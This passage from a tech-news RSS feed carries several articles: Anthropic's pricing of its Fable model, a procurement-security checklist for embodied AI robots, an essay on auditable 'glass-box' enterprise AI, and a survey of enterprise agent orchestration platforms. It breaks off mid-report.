<content:encoded><![CDATA[<p>The Electronic Frontier Foundation (EFF) says Apple is the only major wearable manufacturer among ten leading brands it examined that offers end-to-end encryption for users' cloud-synchronized health data. The privacy group's review also found that transparency around government data requests remains uncommon across the wearable industry, with only Apple and Google publishing transparency reports. EFF’s …</p>
<p>The post <a href="https://cyberinsider.com/eff-apple-the-only-major-wearable-vendor-offering-e2ee-for-health-data/">EFF: Apple the only major wearable vendor offering E2EE for health data</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s ‘free’ Fable offer — a token lock-in trap for users?]]></title>
<description><![CDATA[It’s not so much generosity that’s behind Anthropic’s decision to extend free access to its most advanced model, Fable, for paid subscribers until July 19, analysts say. Its a last-minute move to grab users, data and model evaluation results.



After the free-access period, Anthropic plans to co...]]></description>
<link>https://tsecurity.de/de/3673105/ai-nachrichten/anthropics-free-fable-offer-a-token-lock-in-trap-for-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673105/ai-nachrichten/anthropics-free-fable-offer-a-token-lock-in-trap-for-users/</guid>
<pubDate>Thu, 16 Jul 2026 12:32:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s not so much generosity that’s behind Anthropic’s decision to extend free access to its most advanced model, Fable, for paid subscribers until July 19, analysts say. Its a last-minute move to grab users, data and model evaluation results.</p>



<p class="wp-block-paragraph">After the free-access period, Anthropic plans to convert Fable to a pay-per-use model, at $10 per million input tokens and a whopping $50 for 1 million output tokens.</p>



<p class="wp-block-paragraph">That is double the price of its next most advanced model, Opus 4.8, for input and output tokens. “We’re extending Claude Fable 5 access on all paid plans, as well as keeping Claude Code’s weekly rate limits 50% higher, through July 19,” <a href="https://x.com/claudeai/status/2076351399999557669" target="_blank" rel="noreferrer noopener">Anthropic’s team said in a July 12 tweet</a>.</p>



<p class="wp-block-paragraph">Anthropic keeps extending Fable because it does not yet know what its flagship is worth, said Sanchit Vir Gogia, principal analyst at Greyhound Research. “A vendor confident in its price does not move the same cutoff twice in six days, both times at the wire,” Gogia said.</p>



<p class="wp-block-paragraph">Anthropic is essentially pushing deadlines to test its products, while users gain by being able to put their toughest tasks to Fable, Gogia said.</p>



<p class="wp-block-paragraph">Anthropic, which did not immediately reply to a request for comment about the situation, has already seen plenty of action with Fable and its sister model Mythos. Both have been touted as the company’s most advanced models yet.</p>



<h2 class="wp-block-heading">Fable stumbles, then reappears</h2>



<p class="wp-block-paragraph">Fable was officially launched June 9. Just three days later, on June 12, the <a href="https://www.computerworld.com/article/4185515/anthropics-new-privacy-policy-offers-us-consumers-a-way-around-fable-ban-2.html">US government put export controls on it</a> after Amazon researchers bypassed Fable’s safeguards, prompting the model to identify software vulnerabilities and demonstrate an exploit. </p>



<p class="wp-block-paragraph">After Anthropic scrambled to address the issues — and <a href="https://www.computerworld.com/article/4191565/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models-2.html">after the export controls were lifted</a> — Fable was relaunched July 1.</p>



<p class="wp-block-paragraph">Fable’s freebie extension comes after OpenAI’s latest model, ChatGPT 5.6 Sol, became generally available July 9. Sol is cheaper at $5 per one million tokens input, and $30 for 1 million output tokens.</p>



<p class="wp-block-paragraph">Anthropic and OpenAI are competing aggressively to build market share, said Jack Gold, principal analyst at J. Gold Associates. “Anthropic and OpenAI are looking to go public and the more users they have, the more attractive it is — even if they are not yet producing income,” he said.</p>



<p class="wp-block-paragraph">In some ways, the two companies are following a well-trodden path to get customers hooked on their products and turned into paying customers. That’s what Meta, Google and Microsoft, for instance, have done over the years with various “free” offers that later morphed into paid products. </p>



<p class="wp-block-paragraph">Plus, said Gold, ”The more users you have, the better you can train your models across multiple data sets.”</p>



<p class="wp-block-paragraph">That’s a potential boon for proprietary large language model (LLM) vendors offering free tokens in a bid to lock enterprises and vendors into their AI environments. But numerous experts have warned enterprises not to fall for that tactic. Instead, they argue enterprises <a href="https://www.computerworld.com/article/4188012/too-good-to-be-true-avoid-free-ai-token-offers-or-risk-vendor-lock-in.html">should diversify AI development across multiple AI and cloud vendors</a>, and adopt open-source models.</p>



<h2 class="wp-block-heading">An LLM space race?</h2>



<p class="wp-block-paragraph">According to <a href="https://artificialanalysis.ai/leaderboards/models" target="_blank" rel="noreferrer noopener">LLM benchmarks maintained by Artificial Analysis</a>, Fable is the most intelligent model currently available, with Sol just behind it in second place. <a href="https://livebench.ai/#/" target="_blank" rel="noreferrer noopener">One benchmark by LiveBench</a> places Sol as being better in reasoning, with Fable better at math, data analysis, instruction following and language. Both models have advantages in coding.</p>



<p class="wp-block-paragraph">Meanwhile, Cursor and SpaceXAI on July 8 <a href="https://www.computerworld.com/article/4194914/spacexai-launches-grok-4-5-touts-lower-coding-task-costs-than-ai-rivals-2.html">unveiled Grok 4.5</a>, which the companies said can “handle difficult, long-running tasks that require creatively using tools to solve problems, whether in software engineering, data science, finance, legal work, or anything else you do on a computer,” <a href="https://cursor.com/blog/grok-4-5" target="_blank" rel="noreferrer noopener">the company said in a blog entry</a>.</p>



<p class="wp-block-paragraph">Its pricing is even more aggressive than Fable and ChatGPT 5.6 Sol. Grok 4.5 charges $2 for 1 million input tokens and $6 for 1 million output tokens.</p>



<p class="wp-block-paragraph">There are <a href="https://www.computerworld.com/article/4185848/how-companies-are-racing-to-solve-the-ai-token-problem.html">growing concerns about tokenmaxxing</a>, where enterprises rack up billions of dollars in token spending, blowing past usage limits before finance controls are implemented.</p>



<p class="wp-block-paragraph">Enterprises might decide to spend more on models such as Mythos and Fable — if the benefits are tangible, said Max Leaming, head of data science and AI solutions at ManpowerGroup. Fable and Mythos may “actually be less expensive to use in spite of the spiked token cost because it’s far more efficient,” he said.</p>



<p class="wp-block-paragraph">A company might find that the models use fewer tokens, are faster, and can reduce compute time, he said. “Even though the per-token costs may go up, we may see overall costs go down,” Leaming said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[When AI gets a body, it inherits an attack surface]]></title>
<description><![CDATA[Most security leaders I know working on AI robotics are being shown the same kind of video. A humanoid folds a shirt, sorts a bin, walks a warehouse aisle and a vendor uses the clip to move an embodied AI system from pitch to purchase order. Someone then has to sign off. Robot demos create procur...]]></description>
<link>https://tsecurity.de/de/3673042/it-security-nachrichten/when-ai-gets-a-body-it-inherits-an-attack-surface/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673042/it-security-nachrichten/when-ai-gets-a-body-it-inherits-an-attack-surface/</guid>
<pubDate>Thu, 16 Jul 2026 12:09:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most security leaders I know working on AI robotics are being shown the same kind of video. A humanoid folds a shirt, sorts a bin, walks a warehouse aisle and a vendor uses the clip to move an embodied AI system from pitch to purchase order. Someone then has to sign off. Robot demos create procurement momentum before security teams receive the artifacts needed to evaluate the system as cyber-physical infrastructure.</p>



<p class="wp-block-paragraph">Before the book, I prepared cloud infrastructure operating in China and the United States for cybersecurity compliance audits and for the Multi-Level Protection Scheme, China’s mandatory security-grading regime that determines whether a system is allowed to operate. That work taught me a lesson I carry into every AI conversation now. You cannot secure what you cannot see into, and the buyer rarely sees in. A demo makes it worse. It shows one task, completed once, under conditions the vendor chose. None of what a security team must evaluate is on screen.</p>



<p class="wp-block-paragraph">This used to be a research-lab problem. It is now a procurement line item. The risk changed when embodied AI moved from a research demo to a purchase order.  Vendors are asking security teams to approve embodied AI before the category has audit evidence, logging norms, supplier transparency or a shared-responsibility model.</p>



<p class="wp-block-paragraph">Embodied AI puts a model inside a machine that operates in the physical world: a robot, an arm, a humanoid. Once a model gains motors, sensors and a body, it ceases to be a software endpoint and becomes a cyber-physical system. It inherits hardware, firmware, a supply chain, an installer and a set of remote-access paths. Every one of those is an attack surface that the demo video doesn’t show. An embodied system is sold like software and behaves like a fleet of networked machinery on your floor.</p>



<p class="wp-block-paragraph">Evaluate these systems across five questions: provenance, access, integrity, evidence and accountability. Here is what each means.</p>



<h2 class="wp-block-heading">Evaluation question #1: Provenance</h2>



<p class="wp-block-paragraph">What is inside, and who controls it? A humanoid is an assembly of actuators, lidar units, battery packs, joint modules and controllers, most from a supply chain the buyer never vetted, each running firmware the buyer cannot read. Software teams already fought this fight, which is why the <a href="https://www.csoonline.com/article/573185/what-is-an-sbom-software-bill-of-materials-explained.html">software bill of materials</a> became standard practice. Lack of transparency creates systemic risk. Embodied systems raise the stakes because the firmware now lives in dozens of parts that move. The risk does not depend on whether the robot is Chinese, American, German or Japanese. It depends on how much of the system the buyer can see: the hardware, firmware, remote-access paths and maintenance relationships behind it.  China installs more industrial robots than any other country and sits near the center of the battery supply chain, as well as parts of the lidar and machine-vision supply base, which these systems draw on. Lidar, short for Light Detection and Ranging, uses pulsed laser beams to map an environment in 3D; machine vision handles optical inspection and guidance. Much of that lineage traces to suppliers your team has no relationship with. This is the hardware and firmware version of the third-party risk <a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1.pdf">NIST’s supply chain guidance</a> was written for, except that the component has motors. Demand a hardware and firmware bill of materials, then use it. Flag unsigned firmware. Map which supplier holds update authority for each part. Require a way to verify integrity, and treat any component you cannot identify as unmanaged.</p>



<h2 class="wp-block-heading">Evaluation question #2: Access</h2>



<p class="wp-block-paragraph">Who can reach the fleet? Someone installs these machines, someone services them and the vendor pushes software updates.  Where teleoperation is part of the support model, treat it as a privileged remote-access path, not a convenience feature.  Each is a standing path into a machine that moves and lifts. Security teams have seen this story before. Operational Technology (OT) security went mainstream once industrial systems joined IT networks, and the recurring failure is unmanaged remote access that nobody inventoried. According to one industry survey, <a href="https://www.csoonline.com/article/3595787/ot-security-becoming-a-mainstream-concern.html">roughly half of attacks on OT assets originate in an IT network breach</a>. <a href="https://www.cisa.gov/news-events/alerts/2021/01/07/supply-chain-compromise">SolarWinds</a> showed why a trusted update channel deserves scrutiny when one delivered a backdoor to thousands of networks. Embodied systems add the harder part. The compromised endpoint can move. A remote operator on that channel can drive a machine and push code to every unit at once. Treat the fleet like high-value OT. Inventory every remote path, segment it from the production network, default to deny, require signed and verified updates, apply privileged-access controls to vendor maintenance, and treat an always-on teleoperation link as a backdoor until it is governed.</p>



<h2 class="wp-block-heading">Evaluation question #3: Integrity</h2>



<p class="wp-block-paragraph">Whether the machine can be made to misperceive or misbehave. Researchers have shown that <a href="https://www.usenix.org/conference/usenixsecurity20/presentation/sun">lidar spoofing</a> can cause an autonomous system to brake for an obstacle that is not there or miss one that is. The same class of sensor and model manipulation, on a humanoid sharing a floor with people, produces motion, not a wrong answer on a screen. This is where safety engineering and security part ways. Functional safety stops hazardous motion when a component fails. It plans for accidents. Security plans for an adversary. A hardwired safety circuit can stay independent of the control plane, and a good one does. What it does not tell you is how an attacker reached that control plane, altered the model’s inputs or seized the fleet-management path. Ask the vendor to threat-model sensor spoofing and model manipulation as a path to physical motion. Then ask how you will even know it happened. A spoofed sensor does not announce itself. It shows up as a machine acting incorrectly with confidence.</p>



<p class="wp-block-paragraph">Picture the failure in plain terms. A warehouse robot takes a routine vendor update that changes how it navigates. The buyer cannot verify the firmware, cannot identify the supplier of the sensor module and has no logs to distinguish a spoofed sensor from a model error. The machine keeps moving, and no one can say why.</p>



<h2 class="wp-block-heading">Evaluation question #4: Evidence</h2>



<p class="wp-block-paragraph">Whether the claims are true. You have not found an independent audit of embodied-AI field performance, so the uptime and reliability numbers come from the vendor. You are buying a claim, not a track record. Require independently verified uptime, intervention rate and incident history from a named deployment you can call. “Cutting-edge” is not a control.</p>



<h2 class="wp-block-heading">Evaluation question #5: Accountability</h2>



<p class="wp-block-paragraph">Who owns the risk when it fails? Cloud taught security teams shared responsibility the hard way, after years of arguing which side of the line a breach fell on. Embodied AI arrives without that model, and the stakes are physical: the machine can injure someone. In my compliance work, the question that decided everything was always who is accountable when this thing breaks. Put it in the contract. Define the responsibility boundary, an incident-disclosure timeline, a right to audit and liability for physical harm. A vendor who will not commit in writing is showing you who bears the risk.</p>



<p class="wp-block-paragraph">These five questions share one root. For a decade, the security question was whether you could trust what a model generates. The embodied question is who can reach the machine and what they can make it do. A demo answers neither.</p>



<p class="wp-block-paragraph">Before any embodied system reaches your floor, make these five demands of the vendor.</p>



<ul class="wp-block-list">
<li><strong>Provenance. </strong>A hardware and firmware bill of materials with named suppliers, integrity verification and a vulnerability-disclosure record. No bill of materials, no deal.</li>



<li><strong>Access. </strong>A full map of who installs, who services and every update and teleoperation path, with segmentation, default-deny and signed updates required.</li>



<li><strong>Integrity. </strong>A threat model for sensor spoofing and model manipulation that treats the failure as physical motion, plus logging that a defender can use.</li>



<li><strong>Evidence. </strong>Independently verified uptime, intervention and incident history from a named deployment you can call.</li>



<li><strong>Accountability. </strong>A contract that defines the responsibility boundary, incident-disclosure timelines, audit rights and liability for physical harm.</li>
</ul>



<p class="wp-block-paragraph">The robot demo is built to make you feel the future has arrived. My job, and now yours, is the unglamorous question behind it. Ask what the machine’s attack surface looks like once it is bolted to your floor, wired to your network and updated by someone you have never met.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting from black-box AI to glass-box AI]]></title>
<description><![CDATA[A year ago, most enterprise AI systems generated recommendations. Today, AI systems are approving transactions, routing shipments, updating records, interacting with customers, and triggering downstream software actions with little or no human involvement.



For CIOs, that shift changes the cent...]]></description>
<link>https://tsecurity.de/de/3672874/ai-nachrichten/getting-from-black-box-ai-to-glass-box-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672874/ai-nachrichten/getting-from-black-box-ai-to-glass-box-ai/</guid>
<pubDate>Thu, 16 Jul 2026 11:04:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A year ago, most enterprise AI systems generated recommendations. Today, AI systems are approving transactions, routing shipments, updating records, interacting with customers, and triggering downstream software actions with little or no human involvement.</p>



<p class="wp-block-paragraph">For CIOs, that shift changes the central governance question. The challenge is no longer simply whether an AI model is accurate. It is whether the organization can explain, audit, and defend the decisions the system makes.</p>



<p class="wp-block-paragraph">When an AI assistant suggests a meeting time or summarizes a document, mistakes are inconvenient. When an autonomous AI system issues a refund, reprices a product, modifies a customer record, or initiates a financial transaction, mistakes carry operational, legal, and reputational consequences.</p>



<p class="wp-block-paragraph">When those consequences arrive, “the model decided” is not an acceptable explanation.</p>



<p class="wp-block-paragraph">This is the accountability gap emerging at the center of enterprise AI adoption. Organizations are deploying increasingly autonomous systems while relying on technology that often provides little visibility into how decisions are made. The result is a growing mismatch between the level of authority organizations grant AI and their ability to understand or justify its actions.</p>



<p class="wp-block-paragraph">Black-box AI may have been acceptable when AI primarily generated predictions. It becomes far more problematic when AI begins taking actions on behalf of the business.</p>



<h2 class="wp-block-heading">The lesson software already learned</h2>



<p class="wp-block-paragraph">Fortunately, the technology industry has faced a similar challenge before.</p>



<p class="wp-block-paragraph">As enterprise software systems became more distributed and complex, troubleshooting failures became increasingly difficult. Engineers could no longer rely on intuition to understand what happened when something broke. The solution was <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html" data-type="link" data-id="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a>: the practice of instrumenting systems so their internal state could be understood through logs, metrics, traces, and monitoring.</p>



<p class="wp-block-paragraph">The goal was not to predict every possible failure in advance. It was to create enough visibility that teams could reconstruct what happened after the fact and identify the root cause.</p>



<p class="wp-block-paragraph">Enterprise AI now requires a similar discipline.</p>



<p class="wp-block-paragraph">But AI observability must go beyond traditional software observability. It is not enough to know what action occurred. Organizations also need visibility into why the system believed that action was appropriate.</p>



<p class="wp-block-paragraph">An auditable AI system should be able to answer questions such as:</p>



<ul class="wp-block-list">
<li>What information did the system rely on?</li>



<li>Which tools or data sources did it access?</li>



<li>What alternatives did it consider?</li>



<li>What verification steps were performed?</li>



<li>How confident was it in its conclusion?</li>



<li>What events led to the final action?</li>
</ul>



<p class="wp-block-paragraph">These questions are rapidly becoming essential operational requirements rather than technical nice-to-haves.</p>



<h2 class="wp-block-heading">Why visibility matters more as AI gains autonomy</h2>



<p class="wp-block-paragraph">As AI systems become more autonomous, failures become harder to detect and diagnose.</p>



<p class="wp-block-paragraph">A human reviewing a single AI-generated recommendation can often spot obvious mistakes. A network of AI agents coordinating multiple tasks across business processes presents a different challenge. Decisions can build upon one another. A flawed assumption early in a workflow can propagate through subsequent actions, creating confident but incorrect outcomes.</p>



<p class="wp-block-paragraph">The challenge is rarely identifying that something went wrong. Eventually, an error surfaces through a customer complaint, a failed transaction, an audit finding, or an operational disruption.</p>



<p class="wp-block-paragraph">The challenge is determining why it happened.</p>



<p class="wp-block-paragraph">Which information influenced the decision? Which tools were consulted? Which safeguards worked as intended? Which ones failed?</p>



<p class="wp-block-paragraph">Without visibility into the reasoning process, troubleshooting autonomous AI workflows can become significantly more difficult than debugging traditional software systems.</p>



<p class="wp-block-paragraph">For CIOs responsible for enterprise reliability, compliance, and governance, that lack of visibility creates unacceptable operational risk.</p>



<h2 class="wp-block-heading">Moving toward glass-box AI</h2>



<p class="wp-block-paragraph">The answer is not to slow AI adoption. The answer is to make AI systems observable.</p>



<p class="wp-block-paragraph">Increasingly, organizations are seeking AI systems that behave more like a glass box than a black box. The objective is not to expose every parameter inside a neural network. Rather, it is to provide a clear, auditable record of how decisions were reached and why actions were taken.</p>



<p class="wp-block-paragraph">The most promising approaches share two common characteristics.</p>



<p class="wp-block-paragraph">The first is verification. Instead of treating a single model’s output as ground truth, systems incorporate independent validation steps before actions are executed. Multiple agents, external checks, business rules, or verification workflows help identify errors before they become operational incidents.</p>



<p class="wp-block-paragraph">The second is explainability. Effective systems maintain a decision trail that captures inputs, intermediate reasoning steps, tool usage, verification activities, and outputs in a form that human reviewers can understand.</p>



<p class="wp-block-paragraph">Together, these capabilities create something that has long been expected of human decision-makers but is often missing from AI systems: the ability to show your work.</p>



<h2 class="wp-block-heading">The regulatory and business reality</h2>



<p class="wp-block-paragraph">The push toward AI observability is not being driven solely by technologists.</p>



<p class="wp-block-paragraph">Regulators increasingly expect organizations to demonstrate oversight of automated decision-making systems. Emerging AI governance frameworks place growing emphasis on transparency, traceability, accountability, and human oversight.</p>



<p class="wp-block-paragraph">Customers are moving in the same direction. Whether the decision involves pricing, service, eligibility, or support, people increasingly want the ability to understand and challenge outcomes that affect them.</p>



<p class="wp-block-paragraph">The result is a convergence of operational, regulatory, and market pressures around a single requirement: organizations must be able to explain what their AI systems are doing.</p>



<h2 class="wp-block-heading">Three questions every CIO should ask</h2>



<p class="wp-block-paragraph">Before deploying autonomous AI systems, technology leaders should be able to answer three basic questions:</p>



<ol start="1" class="wp-block-list">
<li>Can we reconstruct the complete decision path that led to an action?</li>



<li>Can we verify critical outputs before actions are executed?</li>



<li>Can a human auditor understand why the decision occurred?</li>
</ol>



<p class="wp-block-paragraph">If the answer to any of those questions is no, the organization may be granting more authority to AI than it can responsibly govern.</p>



<h2 class="wp-block-heading">Accountability will become a competitive advantage</h2>



<p class="wp-block-paragraph">The organizations that succeed with autonomous AI will not necessarily be those that automate the most processes or deploy the largest models. They will be the organizations that combine automation with accountability.</p>



<p class="wp-block-paragraph">Black-box systems made sense when AI primarily generated predictions. As AI increasingly acts on behalf of businesses, customers, and employees, visibility becomes essential.</p>



<p class="wp-block-paragraph">The future of enterprise AI will belong not to systems that merely act, but to systems whose actions can be examined, understood, and trusted.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3672033/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672033/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 16 Jul 2026 00:46:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 6: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. 